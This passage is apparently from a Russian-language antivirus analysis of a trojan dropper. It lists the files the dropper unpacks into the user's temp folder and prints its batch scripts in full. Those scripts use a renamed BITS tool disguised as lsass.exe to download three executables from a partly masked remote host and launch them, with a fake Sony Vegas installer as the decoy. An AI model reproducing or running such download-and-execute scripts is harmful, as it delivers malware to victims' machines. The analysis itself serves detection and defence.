извлекает из своего тела файлы, которые сохраняются в каталоге хранения временных файлов текущего пользователя как
%Temp%IXP000.TMPlsass.exe (118784 байта)
%Temp%IXP000.TMPw.bat (49 байт)
Сценарий содержит следующие строки:
@echo off
%SystemRoot%System32cmd.exe /C r.bat
%Temp%IXP000.TMPr.bat (567 байт)
Сценарий содержит следующие строки:
@echo off
ren lsass lsass.exe
start "" "sony.vegas.pro.80b.build.217-nope.exe"
net start bits
IF NOT EXIST C:nul mkdir C:
lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/ic3.exe "C:ecic3.exe"
IF NOT EXIST C:nul mkdir C:
lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/IC.exe "C:exic.exe"
IF NOT EXIST C:nul mkdir C:
lsass.exe /transfer jman /download /priority high
http://bulg***ave.com/db.exe "C:exdb.exe"
start "" "C:ecic3.exe"
start "" "C:exic.exe"
start "" "C:exdb.exe"
%Temp%IXP000.TMPsony.vegas.pro.80b.build.217-nope.exe (69521 байт)